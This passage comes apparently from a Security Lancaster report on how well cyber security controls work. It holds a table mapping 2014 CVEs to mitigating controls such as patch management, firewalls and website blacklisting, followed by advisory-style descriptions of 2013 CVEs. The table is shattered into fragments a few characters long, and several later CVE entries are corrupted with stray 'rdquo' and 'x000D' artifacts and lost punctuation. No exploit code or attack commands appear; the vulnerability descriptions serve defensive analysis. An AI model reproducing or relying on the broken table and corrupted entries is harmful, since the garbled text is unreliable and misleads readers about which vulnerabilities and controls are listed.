ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability".

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability".

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability".

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.

CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability", a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21, HP 3COM routers and switches, and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a //www.google.com substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability".

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."
CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.
CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.
CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.
CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.
CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.
CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.
CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.
CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.
CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.
CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.
CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."
CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.
CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.
CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.
CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.
CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.
